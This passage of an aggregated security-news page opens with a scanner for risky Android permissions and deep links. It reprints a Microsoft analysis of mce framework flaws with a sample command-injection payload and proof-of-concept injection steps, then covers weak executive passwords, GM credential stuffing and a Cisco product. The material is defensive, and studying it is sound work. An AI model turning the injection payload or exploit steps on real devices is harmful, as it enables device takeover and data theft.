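<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.diag">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.CAMERA"/>
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.INSTALL_PACKAGES"/>
  <application>
    <activity android:name="com.example.sdk.AppActivity" android:exported="true">
      <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <category android:name="android.intent.category.DEFAULT"/>
        <category android:name="android.intent.category.BROWSABLE"/>
        <data android:scheme="exampledigital"/>
      </intent-filter>
    </activity>
    <activity android:name="com.example.sdk.MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
  </application>
</manifest>
"""

# Watch-list: permission -> category used in the summary above.
WATCHED_PERMISSIONS = {
    "android.permission.CAMERA": "peripherals",
    "android.permission.RECORD_AUDIO": "peripherals",
    "android.permission.ACCESS_FINE_LOCATION": "peripherals",
    "android.permission.READ_CONTACTS": "private information",
    "android.permission.READ_PHONE_NUMBERS": "private information",
    "android.permission.INSTALL_PACKAGES": "management",
    "android.permission.WRITE_SETTINGS": "management",
}


def _attr(elem, name):
    """Read an attribute from the android: namespace."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def watched_permissions(manifest_xml):
    """Map each declared permission on the watch-list to its category."""
    root = ET.fromstring(manifest_xml)
    found = {}
    for perm in root.iter("uses-permission"):
        name = _attr(perm, "name")
        if name in WATCHED_PERMISSIONS:
            found[name] = WATCHED_PERMISSIONS[name]
    return found


def browsable_activities(manifest_xml):
    """Return (activity, [schemes], exported) for every activity that has an
    intent-filter carrying the BROWSABLE category. Each custom scheme is an
    entry point a web page can hit, so each one deserves review.
    exported: explicit android:exported="true", or, on pre-Android-12
    defaults, implied by the presence of an intent-filter."""
    root = ET.fromstring(manifest_xml)
    results = []
    for act in root.iter("activity"):
        schemes, browsable = [], False
        for flt in act.findall("intent-filter"):
            cats = {_attr(c, "name") for c in flt.findall("category")}
            if "android.intent.category.BROWSABLE" in cats:
                browsable = True
                schemes += [_attr(d, "scheme") for d in flt.findall("data")
                            if _attr(d, "scheme")]
        if browsable:
            exported_attr = _attr(act, "exported")
            has_filter = act.find("intent-filter") is not None
            exported = exported_attr == "true" or (exported_attr is None and has_filter)
            results.append((_attr(act, "name"), schemes, exported))
    return results


if __name__ == "__main__":
    print(watched_permissions(SAMPLE_MANIFEST))
    print(browsable_activities(SAMPLE_MANIFEST))
```

To run it against a real APK, first decode the binary manifest (for example with apktool) and pass the resulting text to the two functions; the next step in a review is to follow each reported activity's `onCreate` to see what it does with the Intent data, as the analysis below does for AppActivity.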

Digging deeper: Reviewing the mce framework’s main functionality

We reviewed the effects of triggering the com.mce.sdk.AppActivity. Also known as appActivity, this Activity refers to the different functionalities provided by the app. AppActivity extends Activity and therefore has an onCreate method, which traditionally handles the creating Intent.

AppActivity

Here’s a brief description of AppActivity:

  1. AppActivity has a member called “webView” of type “JarvisWebView,” a specialized class that extends WebView.
  2. Upon creation, AppActivity has some optional display choices from the Intent (if they exist) and then loads a predefined web page to the WebView. That predefined page can get arbitrary query parameters from the Intent’s data; that is, everything after a “\?” will be added to the web page.

Thus, if a user clicks this:

mcedigital://ignored\?arbitrary_params

The App’s WebView loads the following web page:

file:///android_asset/applications/user/reflow-container-bundled/index.html?arbitrary_params

The app’s index.html web page (which is an asset built into the Android app) loads two JavaScript files:

  • config.js: a nonexistent file
  • bundle.js: contains much of the app’s logic

Since we wanted to understand the interplay between bundle.js (JarvisJSInterface) and the WebView (JarvisWebView), we analyzed both.

JarvisWebView and JarvisJSInterface

The main features of the WebView, JarvisWebView class, are the following:

A JavaScript Interface is a conspicuous target to look for security issues, as it uses a JavaScript Bridge to allow invoking specific methods inside an Android app. In the case of JarvisJSInterface, three methods are exported:

  • init(String): takes a string that will be used as a JavaScript callback method; in our case, it will always be window.AndroidCallback
  • windowClose(): runs a callback registered by the Android app
  • request(String): sends a service request from the JavaScript client to the server (Android app)

The request method is by far the most interesting, as it performs the following:

  1. Interprets the given string as a JSON object
  2. Extracts the following pieces from the JSON object:
    • Context: a random GUID generated by the client, used to link requests and responses
    • Service: the service we are about to call to
    • Command: an integer
    • Data: optional parameters sent to the service call
  3. Invokes the method serviceCall, which finds the registered service, gets the method based on the command number, and eventually invokes that method using Java reflection

Figure 2: Service::callServiceMethod

The serviceCall is a powerful method, as it allows the WebView to invoke “services” freely. But what are these services, exactly?

Services offered by the mce framework

After we examined the services offered by this framework per the app manifest, we then obtained a list of services that practically give the WebView complete control over the device. The most notable services include:

  • Audio: access and manipulate volume levels, as well as play a tone with a given duration and frequency
  • Camera: take a silent snapshot
  • Connectivity: control and obtain valuable information from NFC, Wi-Fi, and Bluetooth
  • Device: includes various device controlling mechanisms like battery drainage, performing a factory reset, and obtaining information on apps, addresses, sensor data, and much more
  • Discovery: set the device to discoverable
  • Location: obtain the location in various modes and set the location state
  • PackageManager: acquire package info and silently install a new app
  • Power: obtain charging state
  • Sensor: acquire sensor data such as barometer data, light data, proximity data, and whether fingerprinting is working
  • Storage: obtain content such as documents, media, images, and videos

These services inherit from a base class named “Service” and implement two methods:

  • setServiceName: for service identification purposes
  • setServiceMethodMap: for setting up the mapping between the command integer and the method name, argument names, and argument types

For example, here is the Camera service setting its methods:

  • Method 0 is “getCameraList” and expects no arguments.
  • Method 1 is “captureStillImageNoPreview” and expects one String argument.

Figure 3: The Camera service setting its methods

Vulnerability findings

Based on our analysis of the mce framework, we discovered several vulnerabilities. It should be noted that while mobile service providers can customize their mce-framework-based apps, so that the apps are not identical, the vulnerabilities we discovered can all be exploited in the same manner: by injecting code into the web view. Nonetheless, as their apps and framework customizations use different configurations and versions, not all providers are necessarily vulnerable to all the discovered vulnerabilities.

Outdated command-injection vulnerability (CVE-2021-42599)

We found a command-injection vulnerability, tracked as CVE-2021-42599, in the Device service mentioned in the previous section. This service offers rich functionality, including the capability to stop activities of a given package. The client fully controls the argument “value,” which the service splices directly into the following shell command:

am force-stop "value"

Since the argument is not sanitized, an attacker could add backticks or quotation marks to run arbitrary code, like the following:

am force-stop "a"; command-to-run; echo "a"

Figure 4: Command injection proof-of-concept (POC) exploit code implemented in the Device service

According to mce Systems, they have since removed the functionality behind this vulnerability and it is no longer present in more advanced framework versions.
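The fix for this class of bug is to stop building a shell line from untrusted text at all. The following is an added example, not mce Systems' code: in Python it places the vulnerable string-splicing form next to a hardened form that validates the value as an Android package name and returns an argv list (the equivalent of `Runtime.exec(String[])` or `ProcessBuilder` on Android, where no shell parses the argument). A small tokenizer shows how a shell would read each form, using the payload shape quoted above.

```python
"""Vulnerable versus hardened construction of the `am force-stop` call.

Added example, not code from mce Systems or from the original research.
The package-name regex is this example's own approximation of the Android
naming rule (dot-separated Java identifiers, at least two segments).
"""
import re
import shlex

_PACKAGE_RE = re.compile(r"[A-Za-z][A-Za-z0-9_]*(\.[A-Za-z][A-Za-z0-9_]*)+")


def force_stop_command_unsafe(value):
    """Vulnerable form: the client-controlled value is spliced into a shell
    line, so quotes and semicolons in it become shell syntax."""
    return 'am force-stop "%s"' % value


def force_stop_argv(value):
    """Hardened form: reject anything that is not a package name, then return
    an argv list so the value is always a single argument and never parsed
    by a shell."""
    if not _PACKAGE_RE.fullmatch(value):
        raise ValueError("not an Android package name: %r" % value)
    return ["am", "force-stop", value]


def shell_tokens(command_line):
    """Tokenize the way a POSIX shell would, keeping `;` as its own token."""
    lexer = shlex.shlex(command_line, posix=True, punctuation_chars=True)
    return list(lexer)


def command_count(command_line):
    """Number of separate commands a shell would run for this line."""
    return shell_tokens(command_line).count(";") + 1


if __name__ == "__main__":
    payload = 'a"; command-to-run; echo "a'   # the shape shown in Figure 4
    print(command_count(force_stop_command_unsafe(payload)))  # several
    print(force_stop_argv("com.example.app"))                  # one argv
```

The validation step matters even with argv execution: `am` itself interprets its arguments, so restricting the value to the package-name grammar keeps the service from being used to pass unexpected options.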

Exploitation by JavaScript injection with PiTM in certain apps

The services offered by the mce framework further indicated that the following vulnerability resided in the logic of the JavaScript client for apps that are configured to enable plaintext communications such as the app that we initially analyzed. Interestingly, the code for the client is a heavily-obfuscated dynamic JavaScript code that is implemented over several files, mainly bundle.js. Due to the blind trust between the JavaScript client and the JarvisJSInterface server, an attacker who could inject JavaScript contents into the WebView would inherit the permissions that the app already has.

We conceived two injection strategies most likely to be leveraged by attackers:

  1. Affect the JavaScript client behavior by supplying specific GET parameters from the BROWSABLE Intent.
  2. Trigger an app with the BROWSABLE Intent to become a person-in-the-middle (PiTM) and view the device’s entire traffic. Inject JavaScript code if the client ever tries to fetch external content and interpret it as a script or HTML.

Once we reverse-engineered the client’s obfuscated code, we discovered that it could not inject JavaScript from the GET parameters. The only capability permitted was to affect some of the client’s self-tests upon initialization, such as a battery-draining test or a Wi-Fi connectivity test. However, the WebView-fetched plaintext pages that we discovered could be injected into with a PiTM attack.

Our proof-of-concept (POC) exploit code was therefore:

  1. Perform a PiTM for the target device and lure the user into clicking a link with the “mcesystems://” schema.
  2. Inject JavaScript into one of the plaintext page responses that does the following:
    • Hijack the JavaScript interface by calling init with our callback method
    • Use the JavaScript interface request method to get servicing
    • Send the data to our server for information gathering using XHR (XMLHttpRequest)

Figure 5: Injecting a similar JavaScript code to the WebView could allow an attacker to call arbitrary services and methods

Local elevation of privilege with deserialization followed by injection (CVE-2021-42601)  

Some of the apps we analyzed did not pull plaintext pages. Thus, we looked for a local elevation of privilege vulnerability, allowing a malicious app to gain the system apps’ privileges, tracked as CVE-2021-42601.

In the apps mentioned above, we discovered that the main Activity attempted to handle a deep link (a link that launches an app instead of a browser on click) with Google Firebase. Interestingly, this deep-link handling tried to deserialize a structure called PendingDynamicLinkData (representing a link) from an Intent Extra byte array with the key com.google.firebase.dynamiclinks.DYNAMIC_LINK_DATA. This structure was used later by the mce framework to generate various JSON Objects that might contain data from a categoryId query parameter in the original link, and eventually ended up in the member mFlowSDKInput to be injected into the JarvisWebView instance in an unsafe way:

Figure 6: Unsanitized JavaScript loading allowed arbitrary code injection to the WebView

Since the categoryId query parameter might contain apostrophes, one could inject arbitrary JavaScript code into the WebView. We decided to inject a code that would reach out to a server and load a second-stage code, which was the exact one we used for our PiTM scenario.

Figure 7: Local injection POC exploit

Software design against JavaScript injection vulnerabilities

We worked closely with the mce Systems engineering team and discovered that the reason for unsafe loadUrl invocations with JavaScript injections was that the framework used an asynchronous model of operation. When the JavaScript client performs a request, it expects to be notified later when there are results. Since Android JavaScript Bridge only allows primitive types to be sent (for example, Strings), the mce framework notified the JavaScript client by injecting JavaScript with potentially unsafe arguments (the results themselves).

We offered mce Systems a slightly different software design that prevents unsafe JavaScript injection. The description of the flow of information in our proposal is as follows:

  1. The JavaScript client invokes the request method on the Android JavaScript Bridge, supplying the request itself along with a request ID.
  2. The Java server performs the request and stores the result in a cache. The said cache then maps request IDs to results.
  3. The Java server notifies the client by carefully injecting the JavaScript loadUrl("javascript:window.onMceResult(<requestID>);") into the WebView. Note that the only non-constant string is the request ID, which can easily be sanitized. This method “wakes the client up”.
  4. The JavaScript client implementation of onMceResult invokes the Android JavaScript Bridge with the method String fetchResult(String requestId). Note that this method returns a string (which contains the result).

This way, the JavaScript client does not need to poll for asynchronous results while data is safely transferred between the client and the server.
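A runnable simulation of the four-step design above, added here as an example and not mce Systems' or Microsoft's code: both sides are written in JavaScript so the exchange runs in Node, with the Java bridge modelled as a plain object and WebView.loadUrl("javascript:...") modelled as evaluating the script text. The names AndroidBridge, handleRequest, resultCache, injectedScripts and roundTrip are assumptions for the illustration.

```javascript
// Added simulation of the request-ID design above; not mce Systems' framework code. The Java
// server side is modelled in JavaScript so the whole exchange runs in Node.
if (typeof window === "undefined") globalThis.window = globalThis; // Node has no window object
// ---- server side (Java in the real framework) ----
const REQUEST_ID = /^[0-9]{1,18}$/; // the only non-constant token that ever reaches loadUrl
const resultCache = new Map();      // step 2: request ID -> result string
const injectedScripts = [];         // everything handed to "loadUrl", kept for inspection
function loadUrl(url) { // stand-in for WebView.loadUrl: the script text is evaluated as code
  injectedScripts.push(url);
  new Function(url.replace(/^javascript:/, ""))();
}
function handleRequest(req) { // constructed stand-in for real work: echo a field back untouched
  return JSON.stringify({ categoryId: req.categoryId, ok: true });
}
// The bridge object the page sees (these methods would carry @JavascriptInterface in Java)
const AndroidBridge = {
  request(requestId, requestJson) {               // step 1: client supplies request + ID
    if (!REQUEST_ID.test(requestId)) return false; // reject anything but a plain number
    resultCache.set(requestId, handleRequest(JSON.parse(requestJson))); // step 2
    // step 3: wake the client. Only the validated digit string is concatenated, so the
    // result never becomes part of executable script, whatever characters it contains.
    loadUrl("javascript:window.onMceResult(" + requestId + ");");
    return true;
  },
  fetchResult(requestId) {                        // step 4: the result comes back as a String
    const result = resultCache.get(requestId);
    resultCache.delete(requestId);
    return result === undefined ? null : result;
  },
};

// ---- JavaScript client side ----
const pending = new Map();                        // request ID -> callback
let nextId = 1;

window.onMceResult = function (id) {              // invoked by the injected script
  const key = String(id);
  const cb = pending.get(key);
  pending.delete(key);
  if (cb) cb(AndroidBridge.fetchResult(key));     // pull the result back as plain data
};

function sendRequest(requestObj, onResult) {
  const id = String(nextId++);
  pending.set(id, onResult);
  if (!AndroidBridge.request(id, JSON.stringify(requestObj))) pending.delete(id);
}

// Constructed value with the characters that broke out of the quoted string in the old design
const HOSTILE_VALUE = "x'); /* would have run as code */ //";

function roundTrip(requestObj) { // synchronous only because this simulated server answers inline
  let parsed = null;
  sendRequest(requestObj, (raw) => { parsed = JSON.parse(raw); });
  return parsed;
}
```

The value travels as JSON data through the cache and fetchResult, and the only script ever evaluated is the constant wake-up call with a digit string in it.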

Interestingly, Google AndroidX offers a very similar API: webMessageListener. While the said API works quite similarly to our suggestion, it only supports Android versions greater than Lollipop. Thus, the new mce framework now checks the Android version and uses this new Google API where supported, falling back to our proposed solution on older devices.

The above is just one example of our collaboration to help secure our cross-platform ecosystem. According to mce Systems, all of our reported vulnerabilities were addressed.

Improving security for all through threat intelligence sharing and research-driven protections

Microsoft strives to continuously improve security by collaborating with customers, partners, and industry experts. Responding to the evolving threat landscape requires us to expand our capabilities into other devices and non-Windows platforms in addition to further coordinating research and threat intelligence sharing among the larger security community. This case highlighted the need for expert, cross-industry collaboration to effectively mitigate issues.

Moreover, collaborative research such as this informs our seamless protection capabilities across platforms. For example, intelligence from this analysis helped us ensure that Microsoft Defender Vulnerability Management can identify and remediate devices that have these vulnerabilities, providing security operations teams with comprehensive visibility into their organizational exposure and enabling them to reduce the attack surface. In addition, while we’re not aware of any active exploitation of these mobile vulnerabilities in the wild, Microsoft Defender for Endpoint’s mobile threat defense capabilities significantly improve security on mobile devices by detecting potential exploits, malware, and post-exploitation activity.

We will continue to work with the security community to share intelligence about threats and build better protection for all. Microsoft security researchers continually work to discover new vulnerabilities and threats, turning a variety of wide-reaching issues into tangible results and improved solutions that protect users and organizations across platforms every single day. Similarly inquisitive individuals are encouraged to check opportunities to join the Microsoft research team here: https://careers.microsoft.com/.  

Jonathan Bar Or, Sang Shin Jung, Michael Peck, Joe Mansour, and Apurva Kumar
Microsoft 365 Defender Research Team

Source :
https://www.microsoft.com/security/blog/2022/05/27/android-apps-with-millions-of-downloads-exposed-to-high-severity-vulnerabilities/

Why you should act like your CEO’s password is “qwerty”

A poor password at the highest levels of an organisation can cost a company millions in losses.

Recent findings show that half of IT leaders store passwords in shared documents. On top of that, it seems that folks at executive level are not picking good passwords either. Researchers from NordPass combed through a large list of CEO and business owner breaches. Their findings should renew considerations for additional security measures at executive level.

The findings

The five most common passwords among C-level executives, managers, and business owners were “123456”, “password”, “12345”, “123456789”, and our old friend “qwerty”. Terrifyingly, but perhaps not surprisingly, this looks exactly like every other list of the most frequently used passwords, suggesting no extra precautions are in place (or enforced) at the top.

Executives really love to use the names “Tiffany”, “Charlie”, “Michael”, and “Jordan” for their passwords. I was curious to know if these are the names executives give their kids. My entirely unscientific trawl for the names of CEOs’ children turned up lists of CEOs themselves. Henry, William, Jack, James, and David are all very popular names. This doesn’t match up with our list of password names. However, there is one list which claims that the Michaels of this world are most likely to become CEOs. Are CEOs naming their passwords after themselves? I’d like to think not, but then I probably wouldn’t have expected to be writing about “123456” either.

Animals and mythical creatures are popular choices. When executives aren’t naming passwords after themselves, dragons and monkeys are both incredibly popular and also incredibly easy to guess.

Breaking and entering

Common ways corporate breaches and basic passwords spill all over the floor are issues we’ve covered at length. We recently highlighted recommendations from the Cybersecurity and Infrastructure Security Agency which deal with most of the causes of CEO password loss.

A combination of weak and reused passwords, and risky password-sharing habits make up the majority of hits on the “these passwords can lead to nothing good” indicator.

What happens when you combine bad password practices with human error and poor security infrastructure? These weak and obvious passwords just help to bring the whole thing crashing down that little bit faster.

There are some very smart attacks and compromises out there. Clever attackers can exfiltrate data from a network for weeks or months before making a more overt move. You’d expect people hijacking CEO data to be made to really work for it at every level. Sadly this research seems to suggest the opposite is happening in a lot of cases.

If nothing else, I’d love to see the actual response on the part of the criminals. What do they think when pulling down a C-Level executive’s data and discovering their email password is “sandwich”? Are they surprised? Is it business as usual? Do they think it can’t possibly be real, and they’re staring down the wrong end of a prank or law enforcement bust?

Is the CEO password sky falling? A word of caution…

There are some caveats here. The research doesn’t go into detail with regard to additional security measures in place. Yes, a CEO may have the worst password you’ve ever seen. That doesn’t mean the business has been popped right open.

Maybe they had two-factor authentication (2FA) set up. The password may be gone, but unless the attacker also has access to the CEO’s authentication app on their phone, it may not be much use. The CEO may use a hardware authentication token plugged into their desktop. Admins may have set up that one machine specifically for use by the CEO, for all CEO-related activity. It may not be usable remotely, and could be tied to a VPN as an added precaution.

Having said all of that

Manager? Use a password manager

If we’re talking purely about fixing the short, terrible, obvious passwords, then some additional work is required. 2FA, lockouts, and hardware tokens are great. Ultimately they’re fixing a myriad of additional problems regardless of whether the password is good or bad.

To fix bad password practices, we need to look to tools which can improve them and help keep them a bit more secure at the same time. I am talking about password managers, of course.

A password manager is a software application that gets around the twin evils of poor passwords and password reuse by creating strong, random passwords and then remembering them.

They can function online, so they are accessible via the web and can sync passwords between devices, or they can work entirely offline. Offline password managers are arguably more secure. Online components can add additional risk factors and a way for someone to break in via exploits. The important part is to keep the master password to access your vault secure, and to use 2FA if available for an additional layer of protection. Make your master password long and complex—don’t use “qwerty”.

Password managers with browser extensions can help deter phishing. Your password manager will object to entering a password into the wrong website, no matter how convincing it looks. No more risk of accidental logins!

Some password manager tools allow you to share logins with other users in a secure fashion. They don’t show or display the password to the other users, rather they just grant a form of access managed by the tool or app itself. If your CEO has no option but to share a password with somebody else, this is the only safe way to do it.

There’s never been a better time to wean ourselves away from shared password documents and the name “Michael” as the digital keys to an organisation’s kingdom. It’s perhaps time for CEOs and other executives to lead from the front where security is concerned.

Source :
https://blog.malwarebytes.com/malwarebytes-news/2022/05/why-you-should-act-like-your-ceos-password-is-querty/

General Motors suffers credential stuffing attack

American car manufacturer General Motors (GM) says it experienced a credential stuffing attack last month, during which customer information and reward points were stolen.

The subject of the attack was an online platform, run by GM, that helps owners of Chevrolet, Buick, GMC, and Cadillac vehicles manage their bills and services and redeem rewards points.

Credential stuffing

Credential stuffing is a special type of brute force attack where the attacker uses existing username and password combinations, usually ones that were stolen in a data breach on another service.

The intention of such an attack is not to take over the website or platform, but merely to collect as many valid user account credentials as possible and then use that access to commit fraud, or sell the valid credentials to other criminals.

To stop a target from just blocking their IP address, an attacker will typically use rotating proxies. A rotating proxy is a proxy server that assigns a new IP address from the proxy pool for every connection.
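As an added example, not code from GM or Malwarebytes: a small detector run over constructed authentication log lines, showing why the rotating-proxy technique just described leaves per-IP failure counting blind while counting distinct accounts failing per time window still surfaces the run. The log format, the TEST-NET addresses and the function names are assumptions made for the illustration.

```javascript
// Added example, not GM's or Malwarebytes' code. Constructed auth log, one line per attempt:
// "<epoch-seconds> <source-ip> <username> <ok|fail>". Nine attempts across eight TEST-NET
// addresses in 15 seconds (no address used more than twice), then an ordinary user later.
const AUTH_LOG = [
  "1649683201 198.51.100.11 alice fail",
  "1649683203 198.51.100.12 bob fail",
  "1649683205 198.51.100.13 carol fail",
  "1649683206 198.51.100.14 dave fail",
  "1649683208 198.51.100.15 erin ok",    // a reused password that happened to be valid
  "1649683210 198.51.100.16 frank fail",
  "1649683212 198.51.100.17 grace fail",
  "1649683214 198.51.100.12 heidi fail",
  "1649683216 198.51.100.18 ivan fail",
  "1649683320 203.0.113.5 alice ok",     // the real alice, two minutes on, from her usual address
  "1649683325 203.0.113.5 alice fail",
];

function parseAuthLine(line) {
  const [ts, ip, user, outcome] = line.trim().split(/\s+/);
  return { ts: Number(ts), ip, user, ok: outcome === "ok" };
}

// The control rotating proxies are built to evade: list source IPs exceeding a failure limit.
function ipsOverFailureLimit(events, maxFailsPerIp) {
  const fails = new Map();
  for (const e of events) if (!e.ok) fails.set(e.ip, (fails.get(e.ip) || 0) + 1);
  return [...fails].filter(([, n]) => n > maxFailsPerIp).map(([ip]) => ip);
}

// Account-centric view: per fixed window, how many distinct accounts fail, from how many
// sources, and how thinly the attempts are spread over those sources.
function stuffingWindows(events, windowSec, minDistinctUsers) {
  const buckets = new Map();
  for (const e of events) {
    const start = Math.floor(e.ts / windowSec) * windowSec;
    if (!buckets.has(start)) {
      buckets.set(start, { windowStart: start, users: new Set(), ips: new Set(), perIp: new Map(), successes: 0 });
    }
    const b = buckets.get(start);
    if (e.ok) { b.successes += 1; continue; }
    b.users.add(e.user);
    b.ips.add(e.ip);
    b.perIp.set(e.ip, (b.perIp.get(e.ip) || 0) + 1);
  }
  const alerts = [];
  for (const b of buckets.values()) {
    if (b.users.size < minDistinctUsers) continue;
    alerts.push({ windowStart: b.windowStart, distinctUsers: b.users.size, distinctIps: b.ips.size, maxFailsPerIp: Math.max(...b.perIp.values()), successes: b.successes });
  }
  return alerts;
}

const EVENTS = AUTH_LOG.map(parseAuthLine);
```

With a per-IP limit of three failures nothing is blocked, while the account-centric view flags the first minute with eight distinct accounts failing from seven addresses, at most twice each.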

The attack

GM disclosed that it detected the malicious login activity between April 11 and April 29, 2022, and confirmed that the threat actors exchanged customer reward bonuses of some customers for gift certificates.

The My GM Rewards program allows members to earn and redeem points toward buying or leasing a new GM vehicle, as well as for parts, accessories, paid Certified Service, and select OnStar and Connected Services plans.

GM says it immediately investigated the issue and notified affected customers of the issues.

Victims

GM contacted victims of the breach, advising them to follow instructions to recover their GM account. GM is also forcing affected users to reset their passwords before logging in to their accounts again. In the notification for affected customers, GM said it will be restoring rewards points for all customers affected by this breach.

GM specifically pointed out that the credentials used in the attack did not come from GM itself.

“Based on the investigation to date, there is no evidence that the log in information was obtained from GM itself. We believe that unauthorized parties gained access to customer login credentials that were previously compromised on other non-GM sites and then reused those credentials on the customer’s GM account.”

Stolen information

Attackers could have accessed the following Personally Identifiable Information (PII) of a compromised user:

  • First and last name
  • Email address
  • Physical address
  • Username and phone number for registered family members tied to the account
  • Last known and saved favorite location information
  • Search and destination information

Other information that was available was car mileage history, service history, emergency contacts, Wi-Fi hotspot settings (including passwords), and currently subscribed OnStar package (if applicable).

GM is offering credit monitoring for a year.

Mitigation

What could GM have done to prevent the attack? It doesn’t currently offer multi-factor authentication (MFA), which would have stopped the attackers from gaining access to the accounts. GM does ask customers to add a PIN for all purchases.

This incident demonstrates how dangerous it is to re-use your passwords for sites, services and platforms. Even if the account doesn’t seem that important to you, the information obtainable by accessing the account could very well be something you wish to keep private.

Always use a different password for every service you use, and consider using a password manager to store them all. You can read some more of our tips on passwords in our blog dedicated to World Password Day.

Stay safe, everyone!

Source :
https://blog.malwarebytes.com/reports/2022/05/general-motors-suffers-credential-stuffing-attack/

New in SecureX: Device Insights

Since its release, Cisco SecureX has helped over 10,000 customers gain better visibility into their infrastructure. As the number of devices in many customer environments continues to increase, so does the number of products with information about those devices. Between mobile device managers (MDM), posture agents, and other security products, a wealth of data is being collected but is not necessarily being shared or, more importantly, correlated. With the new device insights feature in Cisco SecureX, now available for all SecureX customers, we’re changing that.

Introducing Device Insights

Device insights, which is now generally available, extends our open platform approach to SecureX by allowing you to discover, normalize, and consolidate information about the devices in your environment. But this isn’t just another dashboard pulling data from multiple sources. Device insights fetches data from sources you might expect, like your mobile device manager, but also leverages the wealth of data available in your Cisco Secure products such as Cisco Secure Endpoint, Orbital, Duo, and Umbrella. Combining these sources of data allows you to discover devices that may be sneaking through gaps in your normal device management controls and gain a comprehensive view into each device’s security posture and management status. With device insights, you’ll be able to answer these all-important questions:

  • What types of devices are connected in our environment?
  • What users have been accessing those devices?
  • Where are those devices located?
  • What vulnerabilities are associated with each device?
  • Which security agents are installed?
  • Is the security software up to date?
  • What context do we have from technologies beyond the endpoint?

Supported Data Sources

Now, you might ask: what types of data can I bring into device insights? When we created SecureX, we built a flexible architecture based on modules that anyone can create. Device insights extends this architecture by adding a new capability to our module framework. Here’s a look at what data sources will be supported at launch:

Bringing Everything Together

Once you’ve enabled your data sources, device insights will periodically retrieve data from each source and get to work. Some sources can also publish data in real time to device insights using webhooks. We normalize all of the data and then correlate it between sources so you have one view into each of your devices, not a mess of duplicate information. This results in a single, unified dashboard with easy filtering, a high level view into your environment, and a customizable table of devices (which you can export too!). To see more information about a device, just click on one and you’ll see everything device insights knows, including which source provided which data.

screenshot: SecureX device status dashboard
screenshot: SecureX device detail view

Getting Started

To get started with device insights, simply log into Cisco SecureX and click the new Insights tab! For more information about device insights, check out these resources:
